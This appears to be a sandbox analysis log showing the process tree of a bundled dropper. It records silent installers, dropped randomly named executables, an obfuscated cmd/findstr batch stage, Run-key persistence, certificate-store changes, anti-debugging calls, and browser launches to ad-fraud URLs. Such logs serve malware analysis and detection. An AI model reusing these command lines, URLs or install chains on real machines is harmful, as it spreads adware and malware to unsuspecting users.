C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:111⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6332 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7324 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7064 /prefetch:111⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-EHLN1.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-EHLN1.tmp\WEATHER Manager.tmp" /SL5="$202BC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-GLNO4.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GLNO4.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-GLNO4.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-GLNO4.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629409785 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-RIJIF.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-RIJIF.tmp\VPN.tmp" /SL5="$302AC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-N061V.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-N061V.tmp\Setup.exe" /silent /subid=7207⤵
-
C:\Users\Admin\AppData\Local\Temp\is-B42GS.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-B42GS.tmp\Setup.tmp" /SL5="$204B2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-N061V.tmp\Setup.exe" /silent /subid=7208⤵
- Loads dropped DLL
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\6563401.exe"C:\Users\Admin\AppData\Roaming\6563401.exe"6⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5168 -s 23607⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\5813554.exe"C:\Users\Admin\AppData\Roaming\5813554.exe"6⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\7349243.exe"C:\Users\Admin\AppData\Roaming\7349243.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1661194.exe"C:\Users\Admin\AppData\Roaming\1661194.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\7767953.exe"C:\Users\Admin\AppData\Roaming\7767953.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 24327⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-N061U.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-N061U.tmp\MediaBurner2.tmp" /SL5="$10448,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-TCSS7.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-TCSS7.tmp\3377047_logo_media.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files\Windows NT\OHKTCPPKHK\ultramediaburner.exe"C:\Program Files\Windows NT\OHKTCPPKHK\ultramediaburner.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6PQNJ.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-6PQNJ.tmp\ultramediaburner.tmp" /SL5="$D03D0,281924,62464,C:\Program Files\Windows NT\OHKTCPPKHK\ultramediaburner.exe" /VERYSILENT9⤵
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
-
C:\Users\Admin\AppData\Local\Temp\27-0a2f5-6e1-06483-02f50d76834a4\Rohaedimevi.exe"C:\Users\Admin\AppData\Local\Temp\27-0a2f5-6e1-06483-02f50d76834a4\Rohaedimevi.exe"8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0fa746f8,0x7ffa0fa74708,0x7ffa0fa7471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa0fa746f8,0x7ffa0fa74708,0x7ffa0fa7471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0fa746f8,0x7ffa0fa74708,0x7ffa0fa7471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0fa746f8,0x7ffa0fa74708,0x7ffa0fa7471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0x108,0x118,0x7ffa0fa746f8,0x7ffa0fa74708,0x7ffa0fa7471810⤵
-
C:\Users\Admin\AppData\Local\Temp\7e-13a91-f62-34ca3-c6b2414db3cb7\Cygepelyqa.exe"C:\Users\Admin\AppData\Local\Temp\7e-13a91-f62-34ca3-c6b2414db3cb7\Cygepelyqa.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mipajue5.evt\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\mipajue5.evt\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\mipajue5.evt\GcleanerEU.exe /eufive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5928 -s 25211⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lvp0zefu.k5g\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\lvp0zefu.k5g\installer.exeC:\Users\Admin\AppData\Local\Temp\lvp0zefu.k5g\installer.exe /qn CAMPAIGN="654"10⤵
- Loads dropped DLL
- Enumerates connected drives
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\lvp0zefu.k5g\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\lvp0zefu.k5g\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629409785 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ms5fyfit.mf4\ufgaa.exe & exit9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sszr0g2a.pw3\anyname.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\sszr0g2a.pw3\anyname.exeC:\Users\Admin\AppData\Local\Temp\sszr0g2a.pw3\anyname.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\sszr0g2a.pw3\anyname.exe"C:\Users\Admin\AppData\Local\Temp\sszr0g2a.pw3\anyname.exe" -q11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 84812⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i3t4gbtb.kfp\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\i3t4gbtb.kfp\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\i3t4gbtb.kfp\gcleaner.exe /mixfive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 24811⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rl13ac5w.qj0\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 18606⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵
-
C:\Users\Admin\Documents\zptuyUU2vOreI_AZ_g6Wml5u.exe"C:\Users\Admin\Documents\zptuyUU2vOreI_AZ_g6Wml5u.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\KIWyN8oDPAL_q5FAxO7bvZ1B.exe"C:\Users\Admin\Documents\KIWyN8oDPAL_q5FAxO7bvZ1B.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6448 -s 2807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\wwoZw0zL6FpYhC2QC9z2lOYN.exe"C:\Users\Admin\Documents\wwoZw0zL6FpYhC2QC9z2lOYN.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\IsYk1vMTkQCsUwm3jlbMF1EP.exe"C:\Users\Admin\Documents\IsYk1vMTkQCsUwm3jlbMF1EP.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\i1Y_djwn5aZ0iNIjGZUFmvAo.exe"C:\Users\Admin\Documents\i1Y_djwn5aZ0iNIjGZUFmvAo.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\hq3ySAPs7VbpfC1M1Yo7zhZZ.exe"C:\Users\Admin\Documents\hq3ySAPs7VbpfC1M1Yo7zhZZ.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\2022134.exe"C:\Users\Admin\AppData\Roaming\2022134.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4648 -s 23168⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\3514570.exe"C:\Users\Admin\AppData\Roaming\3514570.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\2145076.exe"C:\Users\Admin\AppData\Roaming\2145076.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\5800732.exe"C:\Users\Admin\AppData\Roaming\5800732.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 24528⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\3FQ8grDk52i7BQkvCsNHVukQ.exe"C:\Users\Admin\Documents\3FQ8grDk52i7BQkvCsNHVukQ.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-U530U.tmp\3FQ8grDk52i7BQkvCsNHVukQ.tmp"C:\Users\Admin\AppData\Local\Temp\is-U530U.tmp\3FQ8grDk52i7BQkvCsNHVukQ.tmp" /SL5="$20556,138429,56832,C:\Users\Admin\Documents\3FQ8grDk52i7BQkvCsNHVukQ.exe"7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-679B5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-679B5.tmp\Setup.exe" /Verysilent8⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629409785 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵
-
C:\Users\Admin\Documents\26DsIakFHlwaF72MzyLMuCHa.exe"C:\Users\Admin\Documents\26DsIakFHlwaF72MzyLMuCHa.exe"6⤵
-
C:\Users\Admin\Documents\QnQRLAnoQ9ORaIKxw41qu4vb.exe"C:\Users\Admin\Documents\QnQRLAnoQ9ORaIKxw41qu4vb.exe"6⤵
-
C:\Users\Admin\Documents\QnQRLAnoQ9ORaIKxw41qu4vb.exe"C:\Users\Admin\Documents\QnQRLAnoQ9ORaIKxw41qu4vb.exe" -q7⤵
-
C:\Users\Admin\Documents\hjaD0UjBigMo_qzj3E_KHUUq.exe"C:\Users\Admin\Documents\hjaD0UjBigMo_qzj3E_KHUUq.exe"6⤵
-
C:\Users\Admin\Documents\PmAVKXr0IlvyRC9f1EWVo2mv.exe"C:\Users\Admin\Documents\PmAVKXr0IlvyRC9f1EWVo2mv.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\txHD9BkXpatuZCl_5EMufjEw.exe"C:\Users\Admin\Documents\txHD9BkXpatuZCl_5EMufjEw.exe"6⤵
-
C:\Users\Admin\Documents\mt3sYUSmRyjy44Brp0Cj4N3C.exe"C:\Users\Admin\Documents\mt3sYUSmRyjy44Brp0Cj4N3C.exe"6⤵
-
C:\Users\Admin\Documents\43JcytYk6n3Te6st8tvaLpmq.exe"C:\Users\Admin\Documents\43JcytYk6n3Te6st8tvaLpmq.exe"6⤵
-
C:\Users\Admin\Documents\r54zOUkjTCF1gsQm8j5uqr2N.exe"C:\Users\Admin\Documents\r54zOUkjTCF1gsQm8j5uqr2N.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\r54zOUkjTCF1gsQm8j5uqr2N.exeC:\Users\Admin\Documents\r54zOUkjTCF1gsQm8j5uqr2N.exe7⤵
-
C:\Users\Admin\Documents\QkMEqNRNbIsp062Yto1Avj5H.exe"C:\Users\Admin\Documents\QkMEqNRNbIsp062Yto1Avj5H.exe"6⤵
-
C:\Users\Admin\Documents\gVjnGCiAQVfFjYcB_W2zB2sC.exe"C:\Users\Admin\Documents\gVjnGCiAQVfFjYcB_W2zB2sC.exe"6⤵
-
C:\Users\Admin\Documents\84hD0bCGa5QhSHfxaizUpChr.exe"C:\Users\Admin\Documents\84hD0bCGa5QhSHfxaizUpChr.exe"6⤵
-
C:\Users\Admin\Documents\84hD0bCGa5QhSHfxaizUpChr.exeC:\Users\Admin\Documents\84hD0bCGa5QhSHfxaizUpChr.exe7⤵
-
C:\Users\Admin\Documents\84hD0bCGa5QhSHfxaizUpChr.exeC:\Users\Admin\Documents\84hD0bCGa5QhSHfxaizUpChr.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\c8NLcQbdFO0_C43NHAeTbszm.exe"C:\Users\Admin\Documents\c8NLcQbdFO0_C43NHAeTbszm.exe"6⤵
-
C:\Users\Admin\Documents\22j09Tr6oyzBVggXnULj4q4i.exe"C:\Users\Admin\Documents\22j09Tr6oyzBVggXnULj4q4i.exe"6⤵
-
C:\Users\Admin\Documents\kUOLMD0V5VWHpx6X8HNRg3RP.exe"C:\Users\Admin\Documents\kUOLMD0V5VWHpx6X8HNRg3RP.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\Documents\HF4QciKUnca9QDw1iPQHISy_.exe"C:\Users\Admin\Documents\HF4QciKUnca9QDw1iPQHISy_.exe"6⤵
-
C:\Users\Admin\Documents\2Y6yljZcYR5EnKOex1d_OYQy.exe"C:\Users\Admin\Documents\2Y6yljZcYR5EnKOex1d_OYQy.exe"6⤵
-
C:\Users\Admin\Documents\2Y6yljZcYR5EnKOex1d_OYQy.exe"C:\Users\Admin\Documents\2Y6yljZcYR5EnKOex1d_OYQy.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\iAmaSs2qzqmAyCSkoGY0MXbv.exe"C:\Users\Admin\Documents\iAmaSs2qzqmAyCSkoGY0MXbv.exe"6⤵
-
C:\Users\Admin\Documents\KeAW_xs2U2xLjBiTEk28_vdB.exe"C:\Users\Admin\Documents\KeAW_xs2U2xLjBiTEk28_vdB.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\KeAW_xs2U2xLjBiTEk28_vdB.exe"C:\Users\Admin\Documents\KeAW_xs2U2xLjBiTEk28_vdB.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tmpB4BA_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpB4BA_tmp.exe"6⤵
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks9⤵
-
C:\Windows\SysWOW64\PING.EXEping YJTUIPJF -n 309⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i9⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵
